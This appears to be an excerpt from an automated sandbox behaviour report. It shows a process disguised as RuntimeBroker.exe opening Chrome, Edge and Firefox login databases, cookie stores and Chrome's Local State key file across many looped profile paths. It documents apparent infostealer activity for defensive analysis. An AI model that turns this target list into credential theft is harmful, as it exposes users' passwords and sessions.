                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
